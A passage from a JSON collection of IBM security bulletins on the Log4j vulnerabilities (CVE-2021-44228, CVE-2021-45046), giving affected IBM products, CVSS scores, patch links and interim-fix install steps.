Private 3.2.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1-build600890-51324&includeSupersedes=0> \"IBM Cloud Private 3.2.1 Patch\" )\n\nFor IBM Cloud Private 3.2.2: [IBM Cloud Private 3.2.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2-build600889-51343&includeSupersedes=0> \"IBM Cloud Private 3.2.2 Patch\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.2.1 and 3.2.2**\n\nThe ibm-icplogging component has been updated to use Elasticsearch 6.8.22. This release upgrades the Log4j package to 2.17.0, which remediates the log4j vulnerabilities and should not trigger false positives in vulnerability scanners as was the case with Elasticsearch 6.8.21. \n\nElasticsearch announcement (ESA-2021-31)\n\n<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.1.0, 3.1.1, 3.1.2, and 3.2.0**\n\nElasticsearch and Logstash within ibm-icplogging component have been updated to remediate the log4j vulnerabilities by removing the vulnerable JndiLookup class from the log4j-core package. Some vulnerability scanners may continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigation sufficiently protects both remote code execution and information leakage.\n\nElasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/elasticsearch-5-0-0-5-6-10-and-6-0-0-6-3-2-log4j-cve-2021-44228-cve-2021-45046-remediation/292054>\n\nLogstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/logstash-5-0-0-6-8-20-and-7-0-0-7-16-0-log4j-cve-2021-44228-cve-2021-45046-remediation/292343>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication \n21 Dec 2021: Patch updated to include Elasticsearch 6.8.22 which includes Log4j 2.17.0. \n22 Dec 2021: Add patch links for 3.1.1, 3.1.2, 3.2.0 \n18 Jan 2022: Add patch link for 3.1.0\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T12:20:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T12:20:25", "id": "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "href": "https://www.ibm.com/support/pages/node/6528268", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-16T19:27:50", "description": "## Summary\n\nApache Log4j is used by IBM\u00ae QRadar Risk Manager to log system events. This bulletin provides a remediation to address the multiple Apache Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046 ) by upgrading IBM\u00ae QRadar Risk Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to obtain sensitive information and execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM QRadar Risk Manager 7.3.0 - 7.3.3 Fix Pack 10\n\nIBM QRadar Risk Manager 7.4.0 - 7.4.3 Fix Pack 4\n\n## Remediation/Fixes\n\n**IBM strongly recommends upgrading now to address the Apache Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046 ) affecting QRadar Risk Manager **\n\n**Note: **\n\nMany QRadar products share a common install, as such to upgrade your QRadar Risk Manager customers need to download the interim fixes linked below. \n\n**Customers who do not use QRadar Risk Manager can also apply this fix to update the unused vulnerable components.**\n\n[QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 10 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FOther+software%2FIBM+Security+QRadar+Vulnerability+Manager&fixids=7.3.3-QRADAR-QRSIEM-20211217150724INT&source=SAR&function=fixId&parent=IBM%20Security> \"QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 10 Interim Fix 01\" )\n\n[QRadar / QRM / QVM / QRIF / QNI 7.4.3 Patch 4 Interim Fix 02](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FOther+software%2FIBM+Security+QRadar+Vulnerability+Manager&fixids=7.4.3-QRADAR-QRSIEM-20211217150701INT&source=SAR&function=fixId&parent=IBM%20Security> \"QRadar / QRM / QVM / QRIF / QNI 7.4.3 Patch 4 Interim Fix 02\" )\n\nFor information on upgrading QRadar please see the appropriate documentation:\n\n[Upgrading 7.3.3](<https://www.ibm.com/docs/en/qsip/7.3.3?topic=upgrading-qradar-v733> \"Upgrading 7.3.3\" )\n\n[Upgrading 7.4](<https://www.ibm.com/docs/en/qsip/7.4?topic=upgrading-qradar-siem> \"Upgrading 7.4\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nNote: QRadar software upgrades use a single SFS file to update multiple products. The interim fix applies mitigations to IBM QRadar Risk Manager, along with IBM QRadar SIEM and other products, even if the software does not require any mitigations. For more information on affected products, see [QRadar: Addendum to Apache Log4j CVE-2021-44228 vulnerability information](<https://www.ibm.com/support/pages/node/6526712>). \n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBQAC\",\"label\":\"IBM QRadar SIEM\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.3, 7.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T16:37:57", "type": "ibm", "title": "Security Bulletin: There are multiple vulnerabilities in the Apache Log4j used in IBM\u00ae QRadar Risk Manager that may allow for remote code execution (RCE).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-07T16:37:57", "id": "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "href": "https://www.ibm.com/support/pages/node/6528440", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Abstract\n\nIBM Cognos Controller is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. Please note that this update also addresses CVE-2021-44228.\n\n## Download Description\n\nApply the following interim fix to all IBM Cognos Controller 10.4.2 installations as soon as possible.\n\nRelease | File \n---|--- \n10.4.2 IF16 | 10.4.2000.1108 \n \n \n \n\n\n## Prerequisites\n\nIBM Cognos Controller 10.4.2 Interim Fix 16 requires that IBM Cognos Controller 10.4.2 is installed.\n\nOur interim fixes are cumulative by design. Hence all interim fixes include all updates from earlier interim fixes.\n\n## Installation Instructions\n\n**Install an interim fix on Microsoft\u00ae Windows\u00ae **\n\n 1. Change to the directory where you have downloaded the interim fix.\n 2. Decompress the .tar.gz file. If you are using WinZip**\u00ae**, select the option \"use folder names\".\n 3. If you want to see the version of a component before you install it, unpack the tar file to disk, or read the table of contents of the tar file.\n 4. Stop Internet Information Services (IIS) Manager (the Default Web Site).\n 5. Shut down the IBM Cognos Controller Consolidation COM+ application through Component Services.\n 6. Stop the following services through the Services Manager. If you do not stop them before the installation, you are prompted during the installation: \n * IBM Cognos\n * IBM Cognos Controller Batch Service\n * IBM Cognos Controller Consolidation\n * IBM Cognos Controller Java Proxy\n * IBM Cognos Controller User Manager\n * IBM Cognos FAP Service\n 7. Back up the content store database.\n 8. If your IBM Cognos Controller environment is customized, back up the entire IBM Cognos Controller location.\n 9. Go to the location where you downloaded and extracted the files.\n 10. Go to the _win64h_ directory and double-click the i_ssetup.exe_ file.\n 11. Follow the directions in the installation wizard, installing in the same location as your existing IBM Cognos Controller server components. The issetup program prompts you to allow the interim fix to create a backup copy in the installation folder before copying new files.\n 12. Open IBM Cognos Configuration, save the configuration, and then start the IBM Cognos service.\n 13. Start the following services: \n * IBM Cognos Controller Batch Service\n * IBM Cognos Controller Consolidation\n * IBM Cognos Controller Java Proxy\n * IBM Cognos Controller User Manager\n * IBM Cognos FAP Service\n 14. If you have a distributed environment, repeat these steps for all remaining IBM Cognos Controller servers.\n 15. Start the Internet Information Services (IIS) Manager (the Default Web Site).\n 16. Start the components Services IBM Cognos Controller Consolidation.\n\n[{\"INLabel\":\"IBM Cognos Controller Installation Guide\",\"INLang\":\"English\",\"INSize\":\"1000000 B\",\"INURL\":\"https://www.ibm.com/docs/en/cognos-controller/10.4.2?topic=1042-introduction\\n\\n\"}] \n\n## Download Package\n\nClick the **FC** link in the **Use Fix Central **section below to start downloading your package.\n\n## Problems Solved\n\nRemediated [Security Vulnerabilities](<https://www.ibm.com/support/pages/node/6528580>)\n\nOn \n\n[{\"DNLabel\":\"IBM Cognos Controller 10.4.2 Interim Fix 16\",\"DNDate\":\"21 Dec 2021\",\"DNLang\":\"English\",\"DNSize\":\"2.25 GB\",\"DNPlat\":{\"label\":\"Windows\",\"code\":\"PF033\"},\"DNURL\":\"https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&amp;product=ibm/Information+Management/Cognos+8+Controller&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=10.4.2.0-BA-CNTRL-Win64-IF016:0&amp;includeSupersedes=0&amp;source=fc&amp;login=true\",\"DNURL_FTP\":\"\",\"DDURL\":null}] \n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"IBM Cognos Controller\"},\"ARM Category\":[{\"code\":\"a8m0z0000001ftoAAA\",\"label\":\"Other\"}],\"ARM Case Number\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.4.2\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T06:02:48", "type": "ibm", "title": "Download IBM Cognos Controller 10.4.2 IF16", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T06:02:48", "id": "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "href": "https://www.ibm.com/support/pages/node/6528424", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Tivoli Netcool Impact to provide logging functionality. This vulnerability has been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to obtain sensitive information and execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool Impact| 7.1.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the interim fix below:\n\nProduct Name| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM Tivoli Netcool Impact| 7.1.0.18 ~ 7.1.0.24| IJ36516| ** \n \n****For 7.1.0.18 through 7.1.0.24:** \nApply Interim Fix [7.1.0-TIV-NCI-IF0010](<https://www.ibm.com/support/pages/node/6536702> \"7.1.0-TIV-NCI-IF0010\" ) \n \n \n \n## Workarounds and Mitigations\n\nIBM strongly recommends to apply the interim fix now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHYH\",\"label\":\"Tivoli Netcool\\/Impact\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.1.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T15:27:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-06T15:27:17", "id": "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "href": "https://www.ibm.com/support/pages/node/6528374", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T13:43:26", "description": "## Summary\n\nThe Operations Dashboard has addressed the following CVE-2021-45046 vulnerability. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-6-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-2 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n18 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud \\u0026 Data Platform\"},\"Product\":{\"code\":\"SSCL60\",\"label\":\"Cloud Platform\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\"},{\"Business Unit\":{\"code\":\"BU004\",\"label\":\"Hybrid Cloud\"},\"Product\":{\"code\":\"SSYMXC\",\"label\":\"IBM Cloud Pak for Integration\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"All\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-11T12:26:59", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Operations Dashboard ( CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-11T12:26:59", "id": "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "href": "https://www.ibm.com/support/pages/node/6536724", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:40:10", "description": "## Summary\n\nApache Log4j is used by IBM Cloud Pak for Data System 1.0 in openshift-logging. This bulletin provides a remediation and workaround for the Apache Log4j vulnerability (CVE-2021-45046). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM Cloud Pak for Data System (ICPDS) 1.0 - Openshift Container Platform 3.11\n\n| 1.0.0.0- 1.0.7.7 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the 